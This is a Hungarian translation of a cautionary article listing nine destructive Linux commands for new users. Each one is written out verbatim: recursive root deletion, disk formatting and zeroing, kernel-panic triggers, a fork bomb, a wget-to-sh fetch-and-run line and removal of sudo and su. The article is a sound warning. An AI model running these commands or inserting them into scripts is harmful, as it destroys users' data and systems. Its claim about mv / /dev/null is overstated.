Bejelentkezés

9 halálos linux parancs

Olvasóink értékelése: 4 / 5

Csillag aktívCsillag aktívCsillag aktívCsillag aktívCsillag inaktív
 

9 halálos Linux parancs, amit soha ne futtass!

(9 Lethal Linux Commands YouShould Never Run - fordítás)

 

Írta: Joel Lee

 

A cikk eredetije itt olvasható: http://www.makeuseof.com/tag/9-lethal-linux-commands-never-run/ A Linux kétélű fegyver lehet. Feltételezi, hogy tudod mit csinálsz és megadja a szabadságot, hogy bármit megtegyél. Kérdés nélkül. Ez kényelmes, ha tudod, hogy éppen mit csinálsz, de azt is jelenti, bármikor tönkre teheted a rendszeredet másodpercek alatt.

 

Új vagy a Linux parancssorban? Ne aggódj. Kezdd a ismerkedést nálunk, a Bevezető a Linux terminálba és 40 alapvető Linux parancs ismertetőkkel. Ezekkel gyorsan megismerkedhetsz a parancssorral.

 

De, függetlenül attól, hogy újonc, vagy veterán linuxos vagy, sose futtass parancsot, ha nem tudod, hogy pontosan mit tesz. Íme néhány a leghalálosabb Linux parancsok közül, amiket – többnyire – kerülni kell.

 

Rekurzív törlés

 

A Linux képessége, hogy bármi törölhető kérdés nélkül, egy áldás, különösen, ha éveken keresztül küzdöttél a Windows „A fájl nem törölhető” hibajelzésével. Ám internetes gazfickók könnyen felültethetnek, bedobva a veszélyes eltávolítás (rm) parancsot, ami a teljes merevlemezedet kisöpörheti.

 

rm -rf /

 

Ez az rm parancsot két kapcsolóval futtatja: a -r, ami rekurzív törlést ír elő az összes alkönyvtárat beleértve és a -f, ami kikényszeríti a törlést, még a csak olvasható fájlokét is, megerősítés nélkül. A parancsot a gyökérkönyvtárban hajtja végre, lényegében tisztára söpörve a teljes rendszeredet.

 

Megjegyzem, a legtöbb mai Linux rendszer figyelmeztet, ha ezt akarod megtenni. Azonban, a figyelmeztetés nem garantált, szóval inkább ne tedd.

 

 

Merevlemez formázása

 

A terminál a kezdő linuxosoknak különösen trükkös, mivel számos lehetőséget nyújt a merevlemez véletlen törlésére. A rekurzív törlés alapvető, de íme egy másik:

 

mkfs.ext3 /dev/hda

 

Ez a parancs a merevlemezt ext3 fájlrendszerre formázza. A lemezmeghajtó formázása nem feltétlenül rosszindulatú művelet, de alapállapotba teszi a meghajtót, mintha teljesen új lenne. Más szavakkal, egy formázott lemez olyan, mint egy üres vászon.

 

A formázás hasznos, partíciók és külső meghajtók esetén, de egy teljes merevlemezre végrehajtani (mint a /dev/hda) veszélyes és könnyen helyrehozhatatlan állapotba hozhatja a rendszert.

 

 

Merevlemez felülírása

 

Ha a véletlen lemezformázás nem lenne elég rossz, felülírható a merevlemez mindenféle adatokkal. A lemezformázás legalább egy, a való életben is tényleg használt folyamat; a meghajtó közvetlen felülírása viszont nem annyira nagyszerű dolog.

 

command > /dev/hda

 

A fenti parancsban a command helyett állhat bármilyen bash parancs. A > operátor átirányítja a tőle balra álló parancs kimenetét a tőle jobbra lévő fájlba. Ebben az esetben teljesen lényegtelen, hogy bal oldali parancsnak mi a kimenete. Az adatsor átkerül és arra szolgál, hogy felülírja a merevlemezen a rendszert.

 

Képzelheted, hogy milyen haszontalan dolgokat ad át.

 

 

Merevlemez kisöprése

 

Íme egy újabb módja a rendszered lerombolásának. Ezúttal a parancs teljesen lenullázza a merevlemezedet. Az adatok nem sérülnek, vagy felülíródnak, hanem a merevlemezedet szó szerint nullákkal tölti fel. Egy meghajtót semmi sem takarít ki jobban, mint ez.

 

dd if=/dev/zero of=/dev/hda

 

A dd egy alacsony szintű utasítás, ami leginkább adatok fizikai meghajtóra írásához használatos. Az if paraméter határozza meg az adat forrását, ami estünkben /dev/zero, ami a Linux különlegessége, nullák végtelen sorát adja. Az of paraméter határozza meg a nullák célját, ami a /dev/hda meghajtó.

 

Igen, lehetnek okai, amiért a lemez nullázása szükséges, de ha nem ismered ezeket az okokat, akkor jobb, ha távol tartod magad ettől a parancstól.

 

 

Merevlemez tönkretétele

 

Ha már unod a merevlemez lerombolásának különféle módjait, akkor várj még egy kicsit. Íme még egy. A Linuxban van egy különleges fájl, a /dev/null, ami számára lényegtelen, hogy mit írsz bele. Tekintheted egyfajta fekete lyuknak, vagy fájldarálónak: bármit is adsz neki, felfalja.

 

mv / /dev/null

 

Látod, hogy hol itt veszély? Az mv parancs megpróbálja a rendszer gyökérkönyvtárát / a /dev/null fekete lyukba mozgatni. Ez egy érvényes parancs és a hatása pusztító: a merevlemezt felemészti és semmi sem marad utána. Ezzel a rendszered használhatatlanná válik.

 

 

Kernel Panic okozása

 

A Windows hírhedt a Kék halál képernyője miatt. A legendák ellenére a Linux sem teljesen biztonságos rendszer. Néha, jelentkezik olyan belső hiba, amiből nem lehet kilábalni, vagyis a rendszer valami olyasmit produkál, mint a kék halál képernyő: a kernel panic-ot.

 

dd if=/dev/random of=/dev/port

echo 1 > /proc/sys/kernel/panic

cat /dev/port

cat /dev/zero > /dev/mem

 

A fenti parancsok okozta bonyodalmak nem annyira érdekesek. Ami viszont lényeges, hogy bármelyik sor futtatása kernel panic-ot okoz, a rendszer újraindítását kényszerítve. Jobb ezektől a parancsoktól tartózkodni, hacsak nem tudod teljes biztonsággal, hogy mit csinálsz.

 

 

Fork Bomb

# Láncos bomba – magyar kifejezést nem találtam rá, de talán ez közelíti meg legjobban a lényegét.

 

A Bash, a Linux-terminál nyelve és elég hatásos. Nemcsak parancsokat, hanem függvényeket is képes futtatni, ami könnyűvé teszi szkriptek írását, ezzel rendszerfeladatok automatizálhatók.

 

Sajnos a függvényekkel veszélyek is járnak.

 

:(){:|:&};:

 

Ezt a furcsa, Fork Bomb-nak hívott parancs, egy különleges kernel panic. Egy : nevű különleges függvényt ír le, ami magát hívja meg kétszer, amikor végrehajtódik. A rekurzív hívások egyike az előtérben fut, miközben a másik a háttérben történik meg.

 

Más szavakkal, a függvény bármikor futva két al-folyamatot szül. Ezek az al-folyamatok hozzák a saját al-folyamataikat és ez a ciklus végtelen hurokban folytatódik. Egyetlen lehetőség, hogy kikerülj belőle, a rendszer újraindítása.

 

 

Távoli szkriptek futtatása

 

Íme egy ártatlan parancs, ami egy Linux rendszeren a napi életben hasznos is lehet. A wget egy web-cím tartalmát szedi le, ami weboldalak elérésére, vagy fájlok letöltésére használható. Ugyanakkor egy egyszerű trükkel veszélyessé is tehető:

 

wget http://egy-megbízhatatalan-oldal-urlje -O- | sh

 

A fenti kombináció letölti az adott URL tartalmát és azonnal betölti az sh parancsba, ami a letöltött tartalmat végrehajtja a terminálban. Ha az URL egy rosszindulatú szkriptre mutat, akkor valószínűleg megpecsételed a sorsodat a paranccsal.

 

 

Rendszergazda-jogok kiiktatása

 

Ez az utolsó parancs elég egyértelmű. A gyakran használt rm parancsot alkalmazza, hogy kikapcsolja a Linux két legfontosabb parancsát: a sudo-t és a su-t. Röviden, ezek a parancsok teszik lehetővé, hogy más parancsokat rendszergazda jogokkal futtass. Nélkülük az élet a Linux-ban kín.

 

rm -f /usr/bin/sudo;rm -f /bin/su

 

Amiért ezt a parancsokat ne futtasd: kényszerítve törli mindkét parancsot a rendszeredből, megerősítést nem kérve, nagy zűrt hagyva maga után. Vannak módszerek, amivel a törölt dolgokat helyreállíthatod, de nem mindig egyértelműek és kellemesek.

 

Légy óvatos! Ne félj terminálban a Linux-parancsokkal kísérletezni, de ugyanakkor tájékozódj és sose hajts végre semmi olyat, aminek a hatásával nem vagy teljesen tisztában. Ha valaki azt mondja neked, hogy „próbáld ki ezt a parancsot”, mindig kétszeresen, vagy háromszorosan ellenőrizd le.

 

Futtattál bármikor is romboló parancsot? Mi történt? Megvezetett már valaki ilyennel? Oszd meg velünk gondolataidat és tapasztalataidat a kommentároknál!

You have no rights to post comments